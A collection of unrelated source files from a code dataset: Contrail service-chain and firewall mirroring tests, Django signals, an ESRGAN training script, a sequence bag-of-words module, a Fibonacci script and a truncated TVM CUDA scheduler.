            mode (str): NOTE(review) — currently unused by this method;
                kept for interface compatibility with callers.

        Returns:
            bool: True on success; assertions abort the test on failure.
        """
        # Install traffic package in VM
        self.vm1_fixture.install_pkg("Traffic")
        self.vm2_fixture.install_pkg("Traffic")
        # Baseline: both UDP and TCP flow under the existing allow-all rule.
        sport = 8000
        dport = 9000
        sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        sport = 8000
        dport = 9001
        sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
                                         'tcp', sport=sport, dport=dport)
        errmsg = "TCP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        # Delete policy
        self.detach_policy(self.vn1_policy_fix)
        self.detach_policy(self.vn2_policy_fix)
        self.unconfig_policy(self.policy_fixture)
        # Update rule with specific port/protocol
        action_list = {'apply_service': self.action_list}
        new_rule = {'direction': '<>',
                    'protocol': 'tcp',
                    'source_network': self.vn1_name,
                    'src_ports': [8000, 8000],
                    'dest_network': self.vn2_name,
                    'dst_ports': [9001, 9001],
                    'simple_action': None,
                    'action_list': action_list
                    }
        self.rules = [new_rule]
        # Create new policy with rule to allow traffic from the VN's
        self.policy_fixture = self.config_policy(self.policy_name, self.rules)
        self.vn1_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn1_fixture)
        self.vn2_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn2_fixture)
        self.verify_si(self.si_fixtures)
        # UDP no longer matches the tcp-only rule, so it must be dropped.
        self.logger.debug("Send udp traffic; with policy rule %s", new_rule)
        sport = 8000
        dport = 9000
        sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s passed; Expected to fail" % (
            sport, dport)
        assert sent and recv == 0, errmsg
        # TCP on the allowed port pair must still flow.
        sport = 8000
        dport = 9001
        self.logger.debug("Send tcp traffic; with policy rule %s", new_rule)
        sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
                                         'tcp', sport=sport, dport=dport)
        errmsg = "TCP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        return True
    def verify_add_new_vns(self):
        """Add a second left/right VN pair with VMs, extend the policy to
        chain their traffic too, verify isolation between unrelated VN
        pairs, then restrict the new pair to UDP only, and finally clean
        the new resources up and re-verify the original pair.

        Relies on fixtures created by a prior verify_svc_* setup call.

        Returns:
            bool: True on success; assertions abort the test on failure.
        """
        # Delete policy
        self.detach_policy(self.vn1_policy_fix)
        self.detach_policy(self.vn2_policy_fix)
        self.unconfig_policy(self.policy_fixture)
        # Create one more left and right VN's
        new_left_vn = "new_left_bridge_vn"
        new_left_vn_net = [get_random_cidr(af=self.inputs.get_af())]
        new_right_vn = "new_right_bridge_vn"
        new_right_vn_net = [get_random_cidr(af=self.inputs.get_af())]
        new_left_vn_fix = self.config_vn(new_left_vn, new_left_vn_net)
        new_right_vn_fix = self.config_vn(new_right_vn, new_right_vn_net)
        # Launch VMs in new left and right VN's
        new_left_vm = 'new_left_bridge_vm'
        new_right_vm = 'new_right_bridge_vm'
        new_left_vm_fix = self.config_vm(new_left_vn_fix, new_left_vm)
        new_right_vm_fix = self.config_vm(new_right_vn_fix, new_right_vm)
        assert new_left_vm_fix.verify_on_setup()
        assert new_right_vm_fix.verify_on_setup()
        # Wait for VM's to come up
        new_left_vm_fix.wait_till_vm_is_up()
        new_right_vm_fix.wait_till_vm_is_up()
        # Add rule to policy to allow traffic from new left_vn to right_vn
        # through SI
        new_rule = {'direction': '<>',
                    'protocol': 'any',
                    'source_network': new_left_vn,
                    'src_ports': [0, -1],
                    'dest_network': new_right_vn,
                    'dst_ports': [0, -1],
                    'simple_action': None,
                    'action_list': {'apply_service': self.action_list}
                    }
        self.rules.append(new_rule)
        # Create new policy with rule to allow traffic from new VN's
        self.policy_fixture = self.config_policy(self.policy_name, self.rules)
        self.vn1_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn1_fixture)
        self.vn2_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn2_fixture)
        # attach policy to new VN's
        new_policy_left_vn_fix = self.attach_policy_to_vn(
            self.policy_fixture, new_left_vn_fix)
        new_policy_right_vn_fix = self.attach_policy_to_vn(
            self.policy_fixture, new_right_vn_fix)
        self.verify_si(self.si_fixtures)
        # Ping from left VM to right VM
        sleep(5)
        self.logger.info("Verfiy ICMP traffic between new VN's.")
        errmsg = "Ping to right VM ip %s from left VM failed" % new_right_vm_fix.vm_ip
        assert new_left_vm_fix.ping_with_certainty(
            new_right_vm_fix.vm_ip), errmsg
        # Cross pairs (new-left -> old-right etc.) have no rule, so pings
        # between them must fail.
        # NOTE(review): the "Expected tp Fail" typo below lives inside a
        # runtime string, so it is intentionally left untouched here.
        self.logger.info(
            "Verfiy ICMP traffic between new left VN and existing right VN.")
        errmsg = "Ping to right VM ip %s from left VM passed; \
Expected tp Fail" % self.vm2_fixture.vm_ip
        assert new_left_vm_fix.ping_with_certainty(self.vm2_fixture.vm_ip,
                                                   expectation=False), errmsg
        self.logger.info(
            "Verfiy ICMP traffic between existing VN's with allow all.")
        errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip), errmsg
        self.logger.info(
            "Verfiy ICMP traffic between existing left VN and new right VN.")
        errmsg = "Ping to right VM ip %s from left VM passed; \
Expected to Fail" % new_right_vm_fix.vm_ip
        assert self.vm1_fixture.ping_with_certainty(new_right_vm_fix.vm_ip,
                                                    expectation=False), errmsg
        # Ping between left VN's
        self.logger.info(
            "Verfiy ICMP traffic between new left VN and existing left VN.")
        errmsg = "Ping to left VM ip %s from another left VM in different VN \
passed; Expected to fail" % self.vm1_fixture.vm_ip
        assert new_left_vm_fix.ping_with_certainty(self.vm1_fixture.vm_ip,
                                                   expectation=False), errmsg
        self.logger.info(
            "Verfiy ICMP traffic between new right VN and existing right VN.")
        errmsg = "Ping to right VM ip %s from another right VM in different VN \
passed; Expected to fail" % self.vm2_fixture.vm_ip
        assert new_right_vm_fix.ping_with_certainty(self.vm2_fixture.vm_ip,
                                                    expectation=False), errmsg
        # Delete policy
        self.detach_policy(self.vn1_policy_fix)
        self.detach_policy(self.vn2_policy_fix)
        self.detach_policy(new_policy_left_vn_fix)
        self.detach_policy(new_policy_right_vn_fix)
        self.unconfig_policy(self.policy_fixture)
        # Add rule to policy to allow only udp traffic from new left_vn to
        # new right_vn through SI
        self.rules.remove(new_rule)
        udp_rule = {'direction': '<>',
                    'protocol': 'udp',
                    'source_network': new_left_vn,
                    'src_ports': [8000, 8000],
                    'dest_network': new_right_vn,
                    'dst_ports': [9000, 9000],
                    'simple_action': None,
                    'action_list': {'apply_service': self.action_list}
                    }
        self.rules.append(udp_rule)
        # Create new policy with rule to allow traffic from new VN's
        self.policy_fixture = self.config_policy(self.policy_name, self.rules)
        self.vn1_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn1_fixture)
        self.vn2_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn2_fixture)
        # attach policy to new VN's
        new_policy_left_vn_fix = self.attach_policy_to_vn(
            self.policy_fixture, new_left_vn_fix)
        new_policy_right_vn_fix = self.attach_policy_to_vn(
            self.policy_fixture, new_right_vn_fix)
        self.verify_si(self.si_fixtures)
        # Ping from left VM to right VM with udp rule
        self.logger.info(
            "Verify ICMP traffic with allow udp only rule from new left VN to new right VN")
        errmsg = "Ping to right VM ip %s from left VM passed; Expected to fail" % new_right_vm_fix.vm_ip
        assert new_left_vm_fix.ping_with_certainty(new_right_vm_fix.vm_ip,
                                                   expectation=False), errmsg
        # Install traffic package in VM
        self.vm1_fixture.install_pkg("Traffic")
        self.vm2_fixture.install_pkg("Traffic")
        new_left_vm_fix.install_pkg("Traffic")
        new_right_vm_fix.install_pkg("Traffic")
        self.logger.info(
            "Verify UDP traffic with allow udp only rule from new left VN to new right VN")
        sport = 8000
        dport = 9000
        sent, recv = self.verify_traffic(new_left_vm_fix, new_right_vm_fix,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        self.logger.info("Verfiy ICMP traffic with allow all.")
        errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip), errmsg
        self.logger.info("Verify UDP traffic with allow all")
        sport = 8001
        dport = 9001
        sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
                                         'udp', sport=sport, dport=dport)
        errmsg = "UDP traffic with src port %s and dst port %s failed" % (
            sport, dport)
        assert sent and recv == sent, errmsg
        # Clean up the new VMs/VNs and their policy attachments
        self.delete_vm(new_left_vm_fix)
        self.delete_vm(new_right_vm_fix)
        self.detach_policy(new_policy_left_vn_fix)
        self.detach_policy(new_policy_right_vn_fix)
        self.delete_vn(new_left_vn_fix)
        self.delete_vn(new_right_vn_fix)
        self.verify_si(self.si_fixtures)
        self.logger.info(
            "Icmp traffic with allow all after deleting the new left and right VN.")
        errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip), errmsg
        return True
def verify_add_new_vms(self):
# Launch VMs in new left and right VN's
new_left_vm = 'new_left_bridge_vm'
new_right_vm = 'new_right_bridge_vm'
new_left_vm_fix = self.config_vm(self.vn1_fixture, new_left_vm)
new_right_vm_fix = self.config_vm(self.vn2_fixture, new_right_vm)
assert new_left_vm_fix.verify_on_setup()
assert new_right_vm_fix.verify_on_setup()
# Wait for VM's to come up
new_left_vm_fix.wait_till_vm_is_up()
new_right_vm_fix.wait_till_vm_is_up()
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed" % new_right_vm_fix.vm_ip
assert new_left_vm_fix.ping_with_certainty(
new_right_vm_fix.vm_ip), errmsg
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert new_left_vm_fix.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip), errmsg
errmsg = "Ping to right VM ip %s from left VM failed" % new_right_vm_fix.vm_ip
assert self.vm1_fixture.ping_with_certainty(
new_right_vm_fix.vm_ip), errmsg
# Install traffic package in VM
self.vm1_fixture.install_pkg("Traffic")
self.vm2_fixture.install_pkg("Traffic")
self.logger.debug("Send udp traffic; with policy rule allow all")
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
# Delete policy
self.detach_policy(self.vn1_policy_fix)
self.detach_policy(self.vn2_policy_fix)
self.unconfig_policy(self.policy_fixture)
# Add rule to policy to allow traffic from new left_vn to right_vn
# through SI
new_rule = {'direction': '<>',
'protocol': 'udp',
'source_network': self.vn1_name,
'src_ports': [8000, 8000],
'dest_network': self.vn2_name,
'dst_ports': [9000, 9000],
'simple_action': None,
'action_list': {'apply_service': self.action_list}
}
self.rules = [new_rule]
# Create new policy with rule to allow traffci from new VN's
self.policy_fixture = self.config_policy(self.policy_name, self.rules)
self.vn1_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn1_fixture)
self.vn2_policy_fix = self.attach_policy_to_vn(
self.policy_fixture, self.vn2_fixture)
self.verify_si(self.si_fixtures)
# Install traffic package in VM
new_left_vm_fix.install_pkg("Traffic")
new_right_vm_fix.install_pkg("Traffic")
self.logger.debug("Send udp traffic; with policy rule %s", new_rule)
sport = 8000
dport = 9000
sent, recv = self.verify_traffic(self.vm1_fixture, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sent, recv = self.verify_traffic(self.vm1_fixture, new_right_vm_fix,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sent, recv = self.verify_traffic(new_left_vm_fix, new_right_vm_fix,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
sent, recv = self.verify_traffic(new_left_vm_fix, self.vm2_fixture,
'udp', sport=sport, dport=dport)
errmsg = "UDP traffic with src port %s and dst port %s failed" % (
sport, dport)
assert sent and recv == sent, errmsg
# Ping from left VM to right VM
errmsg = "Ping to right VM ip %s from left VM failed; Expected to fail" % new_right_vm_fix.vm_ip
assert new_left_vm_fix.ping_with_certainty(
new_right_vm_fix.vm_ip, expectation=False), errmsg
errmsg = "Ping to right VM ip %s from left VM failed; Expected to fail" % self.vm2_fixture.vm_ip
assert new_left_vm_fix.ping_with_certainty(
self.vm2_fixture.vm_ip, expectation=False), errmsg
errmsg = "Ping to right VM ip %s from left VM failed; Expected to fail" % self.vm2_fixture.vm_ip
assert self.vm1_fixture.ping_with_certainty(
self.vm2_fixture.vm_ip, expectation=False), errmsg
errmsg = "Ping to right VM ip %s from left VM passed; Expected to fail" % new_right_vm_fix.vm_ip
assert self.vm1_fixture.ping_with_certainty(
new_right_vm_fix.vm_ip, expectation=False), errmsg
return True
    def verify_firewall_with_mirroring(
            self, si_count=1, svc_scaling=False, max_inst=1,
            firewall_svc_mode='in-network', mirror_svc_mode='transparent', flavor='contrail_flavor_2cpu', vn1_subnets=None, vn2_subnets=None):
        """Validate a firewall service chain combined with traffic
        mirroring to an analyzer service.

        Creates left/right VNs, a firewall ST/SI (transparent or
        in-network[-nat]) plus an analyzer ST/SI, a policy that both
        applies the firewall service and mirrors traffic to the analyzer,
        launches a VM per side and checks that pings succeed and that the
        analyzer captures the expected number of mirrored ICMP packets.

        Returns:
            bool: True on success; assertions abort the test on failure.
        """
        self.vn1_fq_name = "default-domain:" + self.inputs.project_name + \
            ":" + get_random_name("in_network_vn1")
        self.vn1_name = self.vn1_fq_name.split(':')[2]
        # NOTE(review): unlike the other verify_* methods, this wraps the
        # whole argument in a list — a caller passing a list of subnets
        # would end up with a nested list. Confirm callers pass a single
        # CIDR string here.
        self.vn1_subnets = [
            vn1_subnets or get_random_cidr(af=self.inputs.get_af())]
        self.vm1_name = get_random_name("in_network_vm1")
        self.vn2_fq_name = "default-domain:" + self.inputs.project_name + \
            ":" + get_random_name("in_network_vn2")
        self.vn2_name = self.vn2_fq_name.split(':')[2]
        self.vn2_subnets = [
            vn2_subnets or get_random_cidr(af=self.inputs.get_af())]
        self.vm2_name = get_random_name("in_network_vm2")
        self.action_list = []
        self.firewall_st_name = get_random_name("svc_firewall_template_1")
        firewall_si_prefix = get_random_name("svc_firewall_instance") + "_"
        self.mirror_st_name = get_random_name("svc_mirror_template_1")
        mirror_si_prefix = get_random_name("svc_mirror_instance") + "_"
        self.policy_name = get_random_name("policy_in_network")
        self.vn1_fixture = self.config_vn(self.vn1_name, self.vn1_subnets)
        self.vn2_fixture = self.config_vn(self.vn2_name, self.vn2_subnets)
        # Transparent firewalls take no VN references and use the tiny
        # transparent firewall image; in-network variants get the left and
        # right fq-names and the in-network image.
        if firewall_svc_mode == 'transparent':
            self.if_list = []
            self.st_fixture, self.firewall_si_fixtures = self.config_st_si(
                self.firewall_st_name,
                firewall_si_prefix, si_count,
                svc_scaling, max_inst,
                left_vn=None, right_vn=None,
                svc_img_name='tiny_trans_fw',
                svc_mode=firewall_svc_mode, flavor=flavor, project=self.inputs.project_name)
        if firewall_svc_mode == 'in-network'or firewall_svc_mode == 'in-network-nat':
            self.st_fixture, self.firewall_si_fixtures = self.config_st_si(
                self.firewall_st_name,
                firewall_si_prefix, si_count,
                svc_scaling, max_inst,
                left_vn=self.vn1_fq_name,
                right_vn=self.vn2_fq_name,
                svc_img_name='ubuntu-in-net',
                svc_mode=firewall_svc_mode, flavor=flavor, project=self.inputs.project_name)
        # action_list[0..si_count-1] are the firewall SIs; the analyzer SI
        # names are appended afterwards (used by 'mirror_to' below).
        self.action_list = self.chain_si(
            si_count, firewall_si_prefix, self.inputs.project_name)
        self.st_fixture, self.mirror_si_fixtures = self.config_st_si(
            self.mirror_st_name,
            mirror_si_prefix, si_count,
            left_vn=self.vn1_fq_name,
            svc_type='analyzer',
            svc_mode=mirror_svc_mode, flavor=flavor, project=self.inputs.project_name)
        self.action_list += (self.chain_si(si_count,
                                           mirror_si_prefix, self.inputs.project_name))
        # Apply the firewall SI(s) and mirror matching traffic to the
        # analyzer (action_list[1], i.e. the first mirror SI).
        self.rules = [
            {
                'direction': '<>',
                'protocol': 'any',
                'source_network': self.vn1_name,
                'src_ports': [0, -1],
                'dest_network': self.vn2_name,
                'dst_ports': [0, -1],
                'simple_action': 'pass',
                'action_list': {'simple_action': 'pass',
                                'mirror_to': {'analyzer_name': self.action_list[1]},
                                'apply_service': self.action_list[:1]}
            },
        ]
        self.policy_fixture = self.config_policy(self.policy_name, self.rules)
        self.vn1_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn1_fixture)
        self.vn2_policy_fix = self.attach_policy_to_vn(
            self.policy_fixture, self.vn2_fixture)
        self.vm1_fixture = self.config_vm(self.vn1_fixture, self.vm1_name)
        self.vm2_fixture = self.config_vm(self.vn2_fixture, self.vm2_name)
        self.vm1_fixture.wait_till_vm_is_up()
        self.vm2_fixture.wait_till_vm_is_up()
        result, msg = self.validate_vn(
            self.vn1_name, project_name=self.inputs.project_name)
        assert result, msg
        result, msg = self.validate_vn(
            self.vn2_name, project_name=self.inputs.project_name)
        assert result, msg
        self.verify_si(self.firewall_si_fixtures)
        self.verify_si(self.mirror_si_fixtures)
        # NOTE(review): svm_node_ip ends up holding the compute of the
        # *last* service VM visited — confirm that is intended when
        # multiple SIs/SVMs exist.
        for si_fix in self.firewall_si_fixtures:
            svms = self.get_svms_in_si(si_fix, self.inputs.project_name)
            for svm in svms:
                svm_name = svm.name
                host = self.get_svm_compute(svm_name)
                svm_node_ip = host
        # Ping from left VM to right VM
        errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip), errmsg
        # Verify ICMP mirror
        sessions = self.tcpdump_on_all_analyzer(
            self.mirror_si_fixtures, mirror_si_prefix, si_count)
        errmsg = "Ping to right VM ip %s from left VM failed" % self.vm2_fixture.vm_ip
        assert self.vm1_fixture.ping_with_certainty(
            self.vm2_fixture.vm_ip), errmsg
        # Expected mirrored-packet counts depend on VM/SVM placement —
        # presumably 10 packets per traversal of the mirroring point, so
        # some topologies see them twice (20). TODO confirm against the
        # tcpdump_on_all_analyzer/verify_icmp_mirror helpers.
        for svm_name, (session, pcap) in sessions.items():
            if self.vm1_fixture.vm_node_ip == self.vm2_fixture.vm_node_ip:
                if firewall_svc_mode == 'transparent':
                    count = 20
                else:
                    count = 10
            if self.vm1_fixture.vm_node_ip != self.vm2_fixture.vm_node_ip:
                if firewall_svc_mode == 'in-network' and self.vm1_fixture.vm_node_ip == svm_node_ip:
                    count = 10
                else:
                    count = 20
            self.verify_icmp_mirror(svm_name, session, pcap, count)
        return True
| StarcoderdataPython |
3292857 | from django.db.models.signals import post_save, post_delete
from django.dispatch import receiver
from django.conf import settings
from .models import Profile
# Public signal handlers exported by this module.
__all__ = (
    'create_user_profile',
    'save_user_profile',
)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def create_user_profile(sender, instance, created, **kwargs):
    """Create a Profile for every newly created user instance."""
    if not created:
        return
    Profile.objects.create(uid=instance)
@receiver(post_save, sender=settings.AUTH_USER_MODEL)
def save_user_profile(sender, instance, **kwargs):
    """Persist the related profile whenever its owning user is saved."""
    instance.profile.save()
| StarcoderdataPython |
32830 | <reponame>fengjixuchui/scapula<filename>scapula/transform/encoded_rt_to_r9.py
import shoulder
class EncodedRtToR9(shoulder.transform.abstract_transform.AbstractTransform):
    """Transform that retargets encoded register accessors to use r9."""

    @property
    def description(self):
        """Human-readable summary of this transform."""
        return "changing src/dest register for encoded accessors from r0 to r9"

    def do_transform(self, reg):
        """Point every mrs/msr access mechanism of *reg* at register r9."""
        for mechanism_name in ("mrs_register", "msr_register"):
            for accessor in reg.access_mechanisms[mechanism_name]:
                accessor.rt = 9
        return reg
| StarcoderdataPython |
1733634 | from pathlib import Path
from tqdm import tqdm
import tensorflow as tf
from modules.esrgan import rrdb_net
from modules.lr_scheduler import MultiStepLR
from modules.data import load_dataset
from modules.losses import get_pixel_loss
HAS_WANDB_ACCOUNT = True
PROJECT = 'esrgan-tf2'
import wandb
if not HAS_WANDB_ACCOUNT:
wandb.login(anonymous='allow')
else:
wandb.login()
INITIAL_LR = 2e-4
LR_RATE = 0.5
LR_STEPS = [200000, 400000, 600000, 800000]
ADAM_BETA1_G = 0.9
ADAM_BETA2_G = 0.99
W_PIXEL = 1.0
PIXEL_CRITERION = 'l1'
HR_HEIGHT = 128
HR_WIDTH = 128
SCALE = 4
BATCH_SIZE = 16
BUFFER_SIZE = 10240
INPUT_SHAPE=(None, None, 3)
NUM_ITER = 1000000
SAVE_STEPS = 5000
CHECK_POINT_PATH = "./saved/checkpoints/psnr"
Path(CHECK_POINT_PATH).mkdir(parents=True, exist_ok=True)
SAVE_MODEL_PATH = "./saved/models/psnr.h5"
Path(SAVE_MODEL_PATH).parent.mkdir(parents=True, exist_ok=True)
def main():
dataset = load_dataset(HR_HEIGHT, HR_WIDTH, SCALE)
dataset = dataset.repeat()
dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE).prefetch(tf.data.experimental.AUTOTUNE)
model = rrdb_net(input_shape=INPUT_SHAPE,scale_factor=SCALE)
learning_rate = MultiStepLR(INITIAL_LR, LR_STEPS, LR_RATE)
optimizer = tf.keras.optimizers.Adam(learning_rate= learning_rate,
beta_1= ADAM_BETA1_G,
beta_2= ADAM_BETA2_G
)
pixel_loss = get_pixel_loss(PIXEL_CRITERION)
checkpoint = tf.train.Checkpoint(step=tf.Variable(0, name='step'),
optimizer=optimizer,
model=model)
manager = tf.train.CheckpointManager(checkpoint=checkpoint,
directory=CHECK_POINT_PATH,
max_to_keep=3)
if manager.latest_checkpoint:
checkpoint.restore(manager.latest_checkpoint)
print('[*] load ckpt from {} at step {}.'.format(
manager.latest_checkpoint, checkpoint.step.numpy()))
else:
print("[*] training from scratch.")
@tf.function
def train_step(lr, hr):
with tf.GradientTape() as tape:
generated_hr = model(lr, training=True)
loss = W_PIXEL * pixel_loss(hr, generated_hr)
grads = tape.gradient(loss, model.trainable_variables)
optimizer.apply_gradients(zip(grads, model.trainable_variables))
return loss
wandb_run_id = "psnr-training" #@param {type:"string"}
if HAS_WANDB_ACCOUNT:
wandb.init(entity='ilab', project=PROJECT, id=wandb_run_id)
else:
wandb.init(id=wandb_run_id)
remain_steps = max(NUM_ITER - checkpoint.step.numpy(), 0)
pbar = tqdm(total=remain_steps, ncols=50)
for lr, hr in dataset.take(remain_steps):
checkpoint.step.assign_add(1)
steps = checkpoint.step.numpy()
loss = train_step(lr, hr)
wandb.log({"steps": steps, "loss": loss, "learning_rate": optimizer.lr(steps).numpy()})
pbar.set_description("loss={:.4f}, lr={:.1e}".format(loss, optimizer.lr(steps).numpy()))
pbar.update(1)
if steps % SAVE_STEPS == 0:
manager.save()
print("\n[*] save ckpt file at {}".format(manager.latest_checkpoint))
model.save(SAVE_MODEL_PATH)
if __name__ == '__main__':
main() | StarcoderdataPython |
3384715 | <filename>code/FeatureExtractionMode/BOW/BOW4vec.py
from .kmer_bow import km_bow
from .mismatch_bow import mismatch_bow
from .subsequence_bow import subsequence_bow
from .tng_bow import tng_bow
from .dr_bow import dr_bow
from .dt_bow import dt_bow
from ..utils.utils_write import vectors2files
from ..utils.utils_const import DNA, RNA, PROTEIN
def bow(input_file, category, words, sample_num_list, out_format, out_file_list, cur_dir, tm=False, **param_dict):
    """Compute bag-of-words feature vectors for biological sequences.

    Selects the alphabet from `category` ('DNA', 'RNA', anything else means
    protein) and dispatches to the word-segmentation backend named by `words`.

    When `tm` is False the vectors are written to `out_file_list` and the
    function returns None; otherwise the raw vectors are returned.  An
    unknown `words` value prints an error and returns False.
    """
    if category == 'DNA':
        alphabet = DNA
    elif category == 'RNA':
        alphabet = RNA
    else:
        alphabet = PROTEIN

    # Lazy dispatch table: only the selected extractor is ever invoked, so
    # only its param_dict keys need to be present.
    extractors = {
        'Kmer': lambda: km_bow(input_file, k=param_dict['word_size'], alphabet=alphabet, rev_comp=False),
        'RevKmer': lambda: km_bow(input_file, k=param_dict['word_size'], alphabet=alphabet, rev_comp=True),
        'Mismatch': lambda: mismatch_bow(input_file, alphabet, k=param_dict['word_size'], m=param_dict['mis_num']),
        'Subsequence': lambda: subsequence_bow(input_file, alphabet, k=param_dict['word_size'], delta=param_dict['delta']),
        'Top-N-Gram': lambda: tng_bow(input_file, n=param_dict['top_n'], cur_dir=cur_dir, process_num=param_dict['cpu']),
        'DR': lambda: dr_bow(input_file, max_dis=param_dict['max_dis']),
        'DT': lambda: dt_bow(input_file, max_dis=param_dict['max_dis'], cur_dir=cur_dir, process_num=param_dict['cpu']),
    }
    if words not in extractors:
        print('word segmentation method error!')
        return False
    bow_vectors = extractors[words]()

    # Identity check with False is deliberate: it mirrors the original
    # behaviour for falsy-but-not-False values of `tm`.
    if tm is False:
        vectors2files(bow_vectors, sample_num_list, out_format, out_file_list)
        return None
    return bow_vectors
| StarcoderdataPython |
1722509 | <gh_stars>0
# Generate Fibonacci series of N terms.
# Fixes over the original: n == 1 printed two terms (0 and 1) instead of one,
# and the loop variable `next` shadowed the builtin of the same name.
n = int(input("Enter The Limit:"))
f = 0
s = 1
if n <= 0:
    print("The requested series is", f)
elif n == 1:
    # Exactly one term requested: print only the first term.
    print(f)
else:
    print(f)
    print(s)
    for _ in range(2, n):
        # Advance the pair (f, s) -> (s, f + s) and print the new term.
        f, s = s, f + s
        print(s)
1624667 | <gh_stars>10-100
import tvm
import sys
from .schedule_state import RealScheduleState
from .utils import tile_axes, reorder_spatial_and_reduce_axes, get_need_tile, get_factors
from ..utils import ERROR, ASSERT, to_int, REFUSE
def schedule_cuda_allreduce(op, op_to_id, op_to_state, sch, tensors, subgraph, multi_entity, hd_config, debug=sys.stdout):
    """Apply an "allreduce" CUDA schedule to a reduction op, in place.

    The tuner-chosen reduce axis is split, rfactor-ed and bound to
    ``threadIdx.x`` so the partial reduction runs in parallel inside a
    thread block; in the non-compute_at case the spatial axes are also
    tiled and bound to ``blockIdx.{x,y,z}``.  All results (bindings, leaf
    axes, rfactor tensor) are recorded on ``op_to_state[op]``.

    Refuses (via REFUSE) when the parallel extent would be 1 or the total
    thread count exceeds ``hd_config.max_threads``.

    NOTE(review): ``tensors``, ``subgraph`` and ``debug`` are not referenced
    in this body — presumably kept for a uniform scheduler signature; confirm.
    """
    op_id = op_to_id[op]
    op_state = op_to_state[op]
    entity = multi_entity.entities[op_id]
    skeleton = entity.schedule_skeleton
    if skeleton.use_allreduce:
        if not (hasattr(op, "reduce_axis") and len(op.reduce_axis) > 0):
            ERROR("Bad allreduce decision, no reduce_axis!")
        if op_state.buffer_output:
            ERROR("Bad allreduce decision with buffer output")
        ###########################
        # there are two cases
        # 1. this op is compute_at
        # 2. no compute_at
        allreduce_entity = entity.allreduce
        axis_id = allreduce_entity.parallel_parent_axis_id
        ASSERT(axis_id >= 0 and axis_id < len(op.reduce_axis), "Can't find parallel axis id", axis_id)
        # case 1
        if op_state.compute_at:
            consumer_op = op_state.compute_at_op
            consumer_state = op_to_state[consumer_op]
            # inherit the thread axis from consumer
            op_state.binding = consumer_state.copy_binding_for_extents()
            # we don't tile spatial axes any more
            # but we still tile reduce axes
            # before tile, we should correct some factors if necessary
            reduce_need_tile = get_need_tile(allreduce_entity.reduce_need_tile)
            ASSERT(reduce_need_tile[axis_id], "Bad reduce_need_tile in allreduce!")
            # these factors are two-level
            reduce_split_factors = get_factors(allreduce_entity.reduce_split_factor_entities)
            use_factor = allreduce_entity.use_factor.choice
            # Force the split factor to match the consumer's threadIdx.x
            # extent when one is already fixed; otherwise adopt the factor
            # as the threadIdx.x extent.
            if op_state.binding["thread"]["x"]["extent"] > 0:
                tx_extent = op_state.binding["thread"]["x"]["extent"]
                if use_factor == 0:
                    reduce_split_factors[axis_id][0] = tx_extent
                else:
                    reduce_split_factors[axis_id][1] = tx_extent
            else:
                if use_factor == 0:
                    tx_extent = reduce_split_factors[axis_id][0]
                else:
                    tx_extent = reduce_split_factors[axis_id][1]
            # tile
            reduce_axis_map, reduce_split_axis_list, _ = tile_axes(
                sch, op, sch[op].op.reduce_axis, reduce_need_tile, reduce_split_factors, use_factor == 1)
            _, reduce_leveled_axes = reorder_spatial_and_reduce_axes(sch, op, {}, [], reduce_split_axis_list)
            tx = tvm.te.thread_axis("threadIdx.x")
            if tx_extent <= 1:
                # bad allreduce, refuse allredcue
                # update the leaf axes and reduce leaf axes
                op_state.leaf_axes["inner"] = [iv for iv in sch[op].op.axis]
                op_state.leaf_axes_belong_to_op["inner"] = op
                op_state.leaf_reduce_axes = reduce_leveled_axes
                op_state.leaf_reduce_axes_op = op
            else:
                # do allreduce
                if use_factor == 0:
